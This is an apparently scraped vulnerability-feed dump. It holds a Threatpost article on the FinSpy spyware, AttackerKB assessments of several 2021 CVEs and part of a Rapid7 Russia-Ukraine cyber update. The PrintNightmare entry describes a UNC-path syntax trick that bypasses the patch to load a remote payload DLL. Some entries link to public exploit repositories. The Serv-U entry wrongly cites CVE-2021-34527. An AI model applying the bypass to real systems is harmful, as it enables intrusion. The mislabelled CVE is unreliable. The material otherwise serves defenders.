"2021-09-28T22:44:05", "description": "The FinSpy surveillance kit has been driven from its hiding place following an eight-month investigation by Kaspersky researchers. Detections of the spyware trojan have dwindled since 2018, but it turns out that it hasn\u2019t gone away \u2013 it\u2019s simply been hiding behind various first-stage implants that have helped to cloak its activities. At the same time, it\u2019s continued to advance its capabilities.\n\nFinSpy (aka FinFisher or Wingbird) is a multiplatform software for Windows, macOS and Linux that\u2019s marketed as a tool for law enforcement. However, much like [NSO Group\u2019s Pegasus](<https://threatpost.com/pegasus-spyware-uses-iphone-zero-click-imessage-zero-day/168899/>), it\u2019s often seen [being used for far more malicious purposes](<https://threatpost.com/finspy-modules-secure-messaging-apps/146372/>). First discovered in 2011, it\u2019s a full-service spyware, capable of stealing information and credentials as well as keeping tabs on user activities. 
For instance, it gathers file listings and deleted files, as well as various documents; can livestream or record data via webcam and microphone; can snoop on messaging chats; and it uses the developers\u2019 mode in browsers to intercept traffic protected with an HTTPS protocol. [](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nIn the middle of 2019, several suspicious installers for legitimate applications such as TeamViewer, VLC Media Player and WinRAR were found to contain malicious code. However, they didn\u2019t seem connected to any known malware, according to Kaspersky. But one day researchers stumbled across a Burmese-language website that hosted both the trojanized installers as well as samples of FinSpy for Android.\n\n\u201cWe began detecting some suspicious installers of legitimate applications, backdoored with a relatively small, obfuscated downloader,\u201d according to Kaspersky researchers Igor Kuznetsov and Georgy Kucherin, presenting at a retro-themed and virtual Security Analyst Summit (SAS) 2021 on Tuesday. \u201cOver the course of our investigation, we found out that the backdoored installers are nothing more than first-stage implants that are used to download and deploy further payloads before the actual FinSpy trojan.\u201d\n\n## **Multiple Evasion Techniques**\n\nThe new samples are protected with multiple layers of evasion tactics. For one, after a victim downloads and executes a trojanized application, they\u2019re vetted by two components, according to the analysis. The first is a \u201cpre-validator\u201d that runs multiple security checks to ensure that the device it is infecting does not belong to a security researcher.\n\nThe pre-validator downloads a host of security shellcodes from the command-and-control (C2) server and executes them \u2013 33 of them in all. 
Each shellcode collects specific system information (e.g., the current process name) and uploads it back to the server, researchers noted. If any of the checks fail, the C2 server terminates the infection process.\n\nKaspersky researchers Georgy Kucherin and Igor Kuznetsov, presenting at the virtual Security Analyst Summit (SAS) 2021.\n\nIf all security checks pass, the server provides a second component, dubbed the \u201cpost-validator.\u201d It collects information that allows it to identify the victim machine and perhaps validate a specific target (it logs running processes, recently opened documents and screenshots) and sends it to a C2 server specified in its configuration.\n\nBased on the information collected, the C2 server decides whether to deploy the full-fledged trojan platform or remove the infection, according to Kaspersky.\n\nIf FinSpy is finally deployed, it arrives heavily obfuscated with four complex, custom-made obfuscators, according to Kaspersky\u2019s analysis.\n\n\u201cThe primary function of this obfuscation is to slow down the analysis of the spyware,\u201d the researchers explained.\n\nAnother evasion tactic involves a sample of FinSpy that infects machines by replacing the Windows UEFI bootloader, which is responsible for launching the operating system.\n\n\u201cThis method of infection allowed the attackers to install a bootkit without the need to bypass firmware security checks,\u201d according to [the research](<https://securelist.com/finspy-unseen-findings/104322/>). \u201cUEFI infections are very rare and generally hard to execute, they stand out due to their evasiveness and persistence. 
While in this case the attackers did not infect the UEFI firmware itself, but its next boot stage, the attack was particularly stealthy, as the malicious module was installed on a separate partition and could control the boot process of the infected machine.\u201d\n\nThe amount of work put into making FinSpy inaccessible to security researchers is particularly worrying, if impressive, said Kuznetsov. \u201cIt seems like the developers put at least as much work into obfuscation and anti-analysis measures as in the trojan itself,\u201d he noted. \u201cThe fact that this spyware is deployed with high precision and is practically impossible to analyze also means that its victims are especially vulnerable, and researchers face a special challenge \u2013 having to invest an overwhelming amount of resources into untangling each and every sample.\u201d\n\n## **Highly Modular FinSpy**\n\nKaspersky also looked into the capabilities of the latest samples to see if there have been advancements and found that FinSpy\u2019s architecture remains highly modular, but more difficult to analyze than ever. That\u2019s because a component called \u201cthe hider\u201d encrypts all of them.\n\n\u201cIt encrypts all of the memory pages, belonging to the whole infrastructure, including the orchestrator and all of the plugins, and all the memory pages will just stay encrypted until they are needed,\u201d explained Kuznetsov. \u201cThe moment the code has to be executed or data has to be accessed, that one page is decrypted. 
Then when it is no longer needed, it\u2019s just encrypted back.\u201d\n\nHe added, \u201cThis means that if you even make a live memory image of an infected machine it will be very hard to find the trojan in memory, because the only unencrypted thing that you will see, will be a tiny part of this hider.\u201d\n\n\n\nSource: Kaspersky.\n\nThe hider is also responsible for starting \u201cthe orchestrator,\u201d which is a core module that will load the rest of the functionality and control the plugins, according to the analysis. It remains more or less the same as it was in previous samples, Kuznetsov said, but it adds a new module called \u201cthe communicator,\u201d which is a hard-coded binary within a resource section of the orchestrator used to maintain C2 communication.\n\nAnother new module is a process worm.\n\n\u201cThis doesn\u2019t infect or propagate between the machines. Instead, it propagates within the machine, starting from the top process where the whole architecture started (usually explorer.exe or Winlogon.exe),\u201d explained Kuznetsov. \u201cIt will make copies of itself in all the child processes, and all these child processes infected will maintain communication with the parent process.\u201d\n\nThis worm module also hooks the keyboard, mouse clicks and various APIs to FinSpy\u2019s various plugins, for data-collection purposes.\n\n\n\nSource: Kaspersky.\n\n\u201cThe plugins themselves are used mostly to collect information about the victim,\u201d he said. \u201cThere are not many plugins devoted to other tasks. We haven\u2019t found any plugins devoted to lateral movement for example, though there is one curious plugin that is devoted to infecting BlackBerry devices.\u201d\n\nThere are individual plugins for stealing credentials for VPNs, dial-up credentials, Microsoft product key information, browser search and browsing history, information about Wi-Fi connections, file listings, and more. 
There\u2019s also a generic plugin for recording audio from any voice over IP (VoIP) software.\n\n\u201cWhat is also interesting is that there are forensic tools for uncovering information about deleted files and storing that deleted-file history,\u201d Kuznetsov said. \u201cThere is also quite a unique plugin that exploits the debug function of modern browsers. By setting a particular environment variable, they make the browsers dump all the SSL encryption keys on disk. And by doing this, the attackers can decrypt all the SSL traffic from the victim.\u201d\n\nAll of the information can be collected in real time and can be live-streamed to the attackers or pre-recorded. Data collection can be triggered by launching an application of interest as well, the researcher noted.\n\nOne thing is clear: FinSpy remains under active development, and its authors have put a herculean effort into avoiding analysis.\n\n\u201cWe spent about eight months full time, with several researchers,\u201d Kuznetsov said. \u201cDuring that time we really had to upgrade all our tooling. We had to invent and make some tools from scratch, all of which led to producing a 300-page report on this. And what is the conclusion here? We think that there is no conclusion, because we believe that this story is never-ending. They will keep updating and upgrading their infrastructure, all the time.\u201d\n", "cvss3": {}, "published": "2021-09-28T17:45:59", "type": "threatpost", "title": "SAS 2021: FinSpy Surveillance Kit Re-Emerges Stronger Than Ever", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-22005"], "modified": "2021-09-28T17:45:59", "id": "THREATPOST:88FF52A5E5D2048EB3D0F046F6D96C9F", "href": "https://threatpost.com/finspy-surveillance-kit/175068/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "attackerkb": [{"lastseen": "2023-10-18T16:42:20", "description": "Microsoft discovered a remote code execution (RCE) vulnerability in the SolarWinds Serv-U product utilizing a Remote Memory Escape Vulnerability. If exploited, a threat actor may be able to gain privileged access to the machine hosting Serv-U Only. SolarWinds Serv-U Managed File Transfer and Serv-U Secure FTP for Windows before 15.2.3 HF2 are affected by this vulnerability.\n\n \n**Recent assessments:** \n \n**NinjaOperator** at July 12, 2021 4:00pm UTC reported:\n\nSolarWinds was recently notified by Microsoft of a security vulnerability (RCE) related to Serv-U Managed File Transfer Server and Serv-U Secured FTP and have developed a hotfix to resolve this vulnerability. While Microsoft\u2019s research indicates this vulnerability exploit involves a limited, targeted set of customers and a single threat actor, our joint teams have mobilized to address it quickly.\n\nThe vulnerability exists in the latest Serv-U version 15.2.3 HF1 released May 5, 2021, and all prior versions. 
A threat actor who successfully exploits CVE-2021-34527 can run arbitrary code with SYSTEM privileges and install programs; view, change, or delete data, and run programs.\n\n**wvu-r7** at July 22, 2021 4:35pm UTC reported:\n\nSolarWinds was recently notified by Microsoft of a security vulnerability (RCE) related to Serv-U Managed File Transfer Server and Serv-U Secured FTP and have developed a hotfix to resolve this vulnerability. While Microsoft\u2019s research indicates this vulnerability exploit involves a limited, targeted set of customers and a single threat actor, our joint teams have mobilized to address it quickly.\n\nThe vulnerability exists in the latest Serv-U version 15.2.3 HF1 released May 5, 2021, and all prior versions. A threat actor who successfully exploits CVE-2021-34527 can run arbitrary code with SYSTEM privileges and install programs; view, change, or delete data, and run programs.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-07-13T00:00:00", "type": "attackerkb", "title": "CVE-2021-35211", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, 
"acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527", "CVE-2021-35211"], "modified": "2023-10-07T00:00:00", "id": "AKB:9ADF44D2-FA0D-4643-8B97-8B46983B6917", "href": "https://attackerkb.com/topics/Toj3cA6kd7/cve-2021-35211", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-10-18T16:38:40", "description": "Windows Print Spooler Remote Code Execution Vulnerability\n\n \n**Recent assessments:** \n \n**zeroSteiner** at July 08, 2021 5:09pm UTC reported:\n\nCVE-2021-34527 is related to the previous CVE-2021-1675. This fixes a vulnerability whereby an authenticated attacker can connect to the remote print service (via either MS-RPRN or MS-PAR) and add a driver using a custom DLL. Upon successful exploitation, the Print Spool service would load the attacker controlled DLL from either a remote UNC path or a local path. In both cases, the DLL is then executed with NT AUTHORITY\\SYSTEM privileges.\n\nThe patch for CVE-2021-34527 is effective at preventing this attack **only when Point and Print** is disabled, which is the default setting. This can be configured by ensuring the registry key `HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint NoWarningNoElevationOnInstall` is 0. The system does not need to be rebooted to enforce the changed registry key. If that registry key is defined as 1, the vulnerability can still be exploited. With Point and Print enabled, a standard UNC path used over the MS-RPRN vector (via `RpcAddPrinterDriverEx`) will fail with `ERROR_INVALID_PARAMETER`. 
This can be bypassed by converting the UNC path from the standard syntax (`\\\\1.2.3.4\\public\\payload.dll`) to the alternative syntax (`\\??\\UNC\\1.2.3.4\\public\\payload.dll`).\n\nWith the patches applied and Point and Print disabled, the affected calls to `RpcAddPrinterDriverEx` will return ERROR_ACCESS_DENIED.\n\n**ccondon-r7** at July 08, 2021 12:12am UTC reported:\n\nCVE-2021-34527 is related to the previous CVE-2021-1675. This fixes a vulnerability whereby an authenticated attacker can connect to the remote print service (via either MS-RPRN or MS-PAR) and add a driver using a custom DLL. Upon successful exploitation, the Print Spool service would load the attacker controlled DLL from either a remote UNC path or a local path. In both cases, the DLL is then executed with NT AUTHORITY\\SYSTEM privileges.\n\nThe patch for CVE-2021-34527 is effective at preventing this attack **only when Point and Print** is disabled, which is the default setting. This can be configured by ensuring the registry key `HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint NoWarningNoElevationOnInstall` is 0. The system does not need to be rebooted to enforce the changed registry key. If that registry key is defined as 1, the vulnerability can still be exploited. With Point and Print enabled, a standard UNC path used over the MS-RPRN vector (via `RpcAddPrinterDriverEx`) will fail with `ERROR_INVALID_PARAMETER`. 
This can be bypassed by converting the UNC path from the standard syntax (`\\\\1.2.3.4\\public\\payload.dll`) to the alternative syntax (`\\??\\UNC\\1.2.3.4\\public\\payload.dll`).\n\nWith the patches applied and Point and Print disabled, the affected calls to `RpcAddPrinterDriverEx` will return ERROR_ACCESS_DENIED.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5 \nAssessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-02T00:00:00", "type": "attackerkb", "title": "CVE-2021-34527 \"PrintNightmare\"", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2022-05-25T00:00:00", "id": "AKB:7575B82F-7B7A-4416-B1AA-B8A2DF4D0800", "href": "https://attackerkb.com/topics/MIHLz4sY3s/cve-2021-34527-printnightmare", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-10-18T16:33:50", "description": "Windows Print Spooler Remote Code Execution Vulnerability\n\n \n**Recent assessments:** \n \n**kevthehermit** at June 30, 2021 1:53pm UTC reported:\n\n#### Vulnerability\n\nThis was originally classified as a 
Local Priv Escalation, however recent POC code has been released that enabled a domain authenticated user to remotely escalate to `SYSTEM` on vulnerable services\n\n#### Exploit Code\n\nThere are several functional exploits available on Github after the initial repository was removed by the authors.\n\n * <https://github.com/afwu/PrintNightmare> \u2013 A windows binary exploit \n\n * <https://github.com/cube0x0/CVE-2021-1675> \u2013 Python3 using a modified version of impacket \n\n\n#### Mitigation\n\nInitial testing shows that the patches released are not sufficient to stop this exploit. It has been tested in Server 2016 and Server 2019.\n\nDisabling the print spooler can prevent exploitation.\n\nEvent logs can be found for both successful and non-successful exploit attempts in some situations.\n\nSigma rules can be found: <https://github.com/SigmaHQ/sigma/pull/1592>\n\n**andretorresbr** at July 02, 2021 2:37am UTC reported:\n\n#### Vulnerability\n\nThis was originally classified as a Local Priv Escalation, however recent POC code has been released that enabled a domain authenticated user to remotely escalate to `SYSTEM` on vulnerable services\n\n#### Exploit Code\n\nThere are several functional exploits available on Github after the initial repository was removed by the authors.\n\n * <https://github.com/afwu/PrintNightmare> \u2013 A windows binary exploit \n\n * <https://github.com/cube0x0/CVE-2021-1675> \u2013 Python3 using a modified version of impacket \n\n\n#### Mitigation\n\nInitial testing shows that the patches released are not sufficient to stop this exploit. 
It has been tested in Server 2016 and Server 2019.\n\nDisabling the print spooler can prevent exploitation.\n\nEvent logs can be found for both successful and non-successful exploit attempts in some situations.\n\nSigma rules can be found: <https://github.com/SigmaHQ/sigma/pull/1592>\n\n**architect00** at July 01, 2021 1:46pm UTC reported:\n\n#### Vulnerability\n\nThis was originally classified as a Local Priv Escalation, however recent POC code has been released that enabled a domain authenticated user to remotely escalate to `SYSTEM` on vulnerable services\n\n#### Exploit Code\n\nThere are several functional exploits available on Github after the initial repository was removed by the authors.\n\n * <https://github.com/afwu/PrintNightmare> \u2013 A windows binary exploit \n\n * <https://github.com/cube0x0/CVE-2021-1675> \u2013 Python3 using a modified version of impacket \n\n\n#### Mitigation\n\nInitial testing shows that the patches released are not sufficient to stop this exploit. It has been tested in Server 2016 and Server 2019.\n\nDisabling the print spooler can prevent exploitation.\n\nEvent logs can be found for both successful and non-successful exploit attempts in some situations.\n\nSigma rules can be found: <https://github.com/SigmaHQ/sigma/pull/1592>\n\n**NinjaOperator** at June 29, 2021 5:55pm UTC reported:\n\n#### Vulnerability\n\nThis was originally classified as a Local Priv Escalation, however recent POC code has been released that enabled a domain authenticated user to remotely escalate to `SYSTEM` on vulnerable services\n\n#### Exploit Code\n\nThere are several functional exploits available on Github after the initial repository was removed by the authors.\n\n * <https://github.com/afwu/PrintNightmare> \u2013 A windows binary exploit \n\n * <https://github.com/cube0x0/CVE-2021-1675> \u2013 Python3 using a modified version of impacket \n\n\n#### Mitigation\n\nInitial testing shows that the patches released are not sufficient to stop this exploit. 
It has been tested in Server 2016 and Server 2019.\n\nDisabling the print spooler can prevent exploitation.\n\nEvent logs can be found for both successful and non-successful exploit attempts in some situations.\n\nSigma rules can be found: <https://github.com/SigmaHQ/sigma/pull/1592>\n\n**ccondon-r7** at July 01, 2021 1:43pm UTC reported:\n\n#### Vulnerability\n\nThis was originally classified as a Local Priv Escalation, however recent POC code has been released that enabled a domain authenticated user to remotely escalate to `SYSTEM` on vulnerable services\n\n#### Exploit Code\n\nThere are several functional exploits available on Github after the initial repository was removed by the authors.\n\n * <https://github.com/afwu/PrintNightmare> \u2013 A windows binary exploit \n\n * <https://github.com/cube0x0/CVE-2021-1675> \u2013 Python3 using a modified version of impacket \n\n\n#### Mitigation\n\nInitial testing shows that the patches released are not sufficient to stop this exploit. It has been tested in Server 2016 and Server 2019.\n\nDisabling the print spooler can prevent exploitation.\n\nEvent logs can be found for both successful and non-successful exploit attempts in some situations.\n\nSigma rules can be found: <https://github.com/SigmaHQ/sigma/pull/1592>\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-08T00:00:00", "type": "attackerkb", "title": "CVE-2021-1675", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, 
"userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2023-10-07T00:00:00", "id": "AKB:CDA9C43E-015D-4B04-89D3-D6CABC5729B9", "href": "https://attackerkb.com/topics/dI1bxlM0ay/cve-2021-1675", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-11-30T20:26:22", "description": "ForgeRock AM server before 7.0 has a Java deserialization vulnerability in the jato.pageSession parameter on multiple pages. The exploitation does not require authentication, and remote code execution can be triggered by sending a single crafted /ccversion/* request to the server. The vulnerability exists due to the usage of Sun ONE Application Framework (JATO) found in versions of Java 8 or earlier\n\n \n**Recent assessments:** \n \n**ccondon-r7** at June 30, 2021 2:35pm UTC reported:\n\nTrivial RCE with a one-line request. Rapid7 Labs is seeing this product in quite a few large enterprises\u2014patch quickly. 
Shout-out to Portswigger for their excellent write-up: <https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464>\n\nUpdate July 12, 2021: We now have reliable private reports of exploitation in the wild.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-22T00:00:00", "type": "attackerkb", "title": "Pre-auth RCE in ForgeRock Access Manager (CVE-2021-35464)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-35464"], "modified": "2023-10-07T00:00:00", "id": "AKB:77E58EB9-547A-4137-BD9B-C2E5E487FA8E", "href": "https://attackerkb.com/topics/KnAX5kffui/pre-auth-rce-in-forgerock-access-manager-cve-2021-35464", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-10-18T16:40:12", "description": "Windows Elevation of Privilege Vulnerability\n\n \n**Recent assessments:** \n \n**Dviros** at July 25, 2021 9:35am UTC reported:\n\nVulnerability is easy to exploit \u2013 by interacting with the local ShadowCopy volume, and copying it to a local folder, 
attackers can easily elevate their privileges. \nSeveral exploits were already released, allowing the hashes to be parsed while copying the SAM\\SECURITY\\SYSTEM hives: \n<https://github.com/cube0x0/CVE-2021-36934> \n<https://github.com/HuskyHacks/ShadowSteal>\n\nThis vulnerability occurs due to the permissive \u201cC:\\Windows\\System32\\Config*.*\u201d privileges, \u201cBUILTIN\\Users\u201d, allowing any user to read and execute the files.\n\n**ccondon-r7** at July 21, 2021 4:24pm UTC reported:\n\nVulnerability is easy to exploit \u2013 by interacting with the local ShadowCopy volume, and copying it to a local folder, attackers can easily elevate their privileges. \nSeveral exploits were already released, allowing the hashes to be parsed while copying the SAM\\SECURITY\\SYSTEM hives: \n<https://github.com/cube0x0/CVE-2021-36934> \n<https://github.com/HuskyHacks/ShadowSteal>\n\nThis vulnerability occurs due to the permissive \u201cC:\\Windows\\System32\\Config*.*\u201d privileges, \u201cBUILTIN\\Users\u201d, allowing any user to read and execute the files.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-22T00:00:00", "type": "attackerkb", "title": "CVE-2021-36934 Windows Elevation of Privilege", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": 
"PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2023-10-07T00:00:00", "id": "AKB:68C898AA-7786-44EB-AA49-BDCE98588D8C", "href": "https://attackerkb.com/topics/DOrZUykRSX/cve-2021-36934-windows-elevation-of-privilege", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-10-18T16:42:03", "description": "Zoho ManageEngine ADSelfService Plus version 6113 and prior is vulnerable to REST API authentication bypass with resultant remote code execution.\n\n \n**Recent assessments:** \n \n**ccondon-r7** at November 08, 2021 3:18pm UTC reported:\n\nRapid7\u2019s services teams are observing opportunistic exploitation of this vulnerability in the wild. Sounds like coin miners are the payload so far.\n\n**wvu-r7** at September 15, 2021 8:54am UTC reported:\n\nRapid7\u2019s services teams are observing opportunistic exploitation of this vulnerability in the wild. 
Sounds like coin miners are the payload so far.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-07T00:00:00", "type": "attackerkb", "title": "CVE-2021-40539", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539"], "modified": "2021-09-15T00:00:00", "id": "AKB:DEB21742-F92B-4F5A-931C-082502383C34", "href": "https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "rapid7blog": [{"lastseen": "2022-03-16T21:28:40", "description": "\n\nCyberattacks are a distinct concern in the [Russia-Ukraine conflict](<https://www.rapid7.com/blog/tag/russia-ukraine-conflict/>), with the potential to impact individuals and organizations far beyond the physical frontlines. 
With events unfolding rapidly, we want to provide a single channel by which we can communicate to the security community the major cyber-related developments from the conflict each day.\n\nEach business day, we will update this blog at 5 pm EST with what we believe are the need-to-know updates in cybersecurity and threat intelligence relating to the Russia-Ukraine conflict. We hope this blog will make it easier for you to stay current with these events during an uncertain and quickly changing time.\n\n* * *\n\n## March 16, 2022\n\nUkrainian President Volodymyr Zelenskyy [delivered a virtual speech](<https://www.nbcnews.com/politics/congress/zelenskyy-expected-press-us-military-support-address-congress-rcna20088>) to US lawmakers on Wednesday, asking again specifically for a no-fly zone over Ukraine and for additional support. \n\nThe White House released a new [fact sheet](<https://www.whitehouse.gov/briefing-room/statements-releases/2022/03/16/fact-sheet-on-u-s-security-assistance-for-ukraine/>) detailing an additional $800 million in security assistance to Ukraine. \n\n**Threat Intelligence Update**\n\n * **UAC-0056 targets Ukrainian entities**\n\nSentinelOne researchers reported that UAC-0056 targeted Ukrainian entities using a malicious Python-based package, masquerading as a Ukrainian language translation software. Once installed, the fake app deployed various malware, such as Cobalt Strike, GrimPlant, and GraphSteel.\n\n_Source: [Sentinel One](<https://www.sentinelone.com/blog/threat-actor-uac-0056-targeting-ukraine-with-fake-translation-software/>)_\n\n * **A hacker was caught routing calls to Russian troops**\n\nThe Security Service of Ukraine claimed to have arrested a hacker that helped deliver communications from within Russia to the Russian troops operating in the Ukrainian territory. 
The hacker also sent text messages to Ukrainian security officers and civil servants, exhorting them to surrender.\n\n_Source: [The Verge](<https://www.theverge.com/2022/3/15/22979381/phone-relay-capture-russia-military-unencrypted-communications-ukraine>)_\n\n## March 15, 2022\n\nThe Ukrainian Ministry of Defense [leaked documents](<https://www.scmagazine.com/analysis/breach/in-a-first-ukraine-leaks-russian-intellectual-property-as-act-of-war>) of a Russian nuclear power plant. This may be the first-ever instance of a hack-and-leak operation to weaponize the disclosure of intellectual property to harm a nation.\n\nResearchers at INFOdocket, a subsidiary of [Library Journal](<https://en.wikipedia.org/wiki/Library_Journal>), have [created](<https://www.infodocket.com/2022/03/10/briefings-reports-and-updates-about-the-conflict-in-ukraine-from-the-congressional-research-service-european-parliament-research-service-and-uk-house-of-commons-library/>) a compendium of briefings, reports, and updates about the conflict in Ukraine from three research organizations: Congressional Research Service (CRS), European Parliament Research Service (EPRS), and the UK House of Commons Library. The resource will be updated as each of the three organizations releases relevant new content.\n\nThe Wall Street Journal [is reporting](<https://www.wsj.com/articles/russian-prosecutors-warn-western-companies-of-arrests-asset-seizures-11647206193>) that Russian prosecutors have issued warnings to Western companies in Russia, threatening to arrest corporate leaders there who criticize the government or to seize assets of companies that withdraw from the country. 
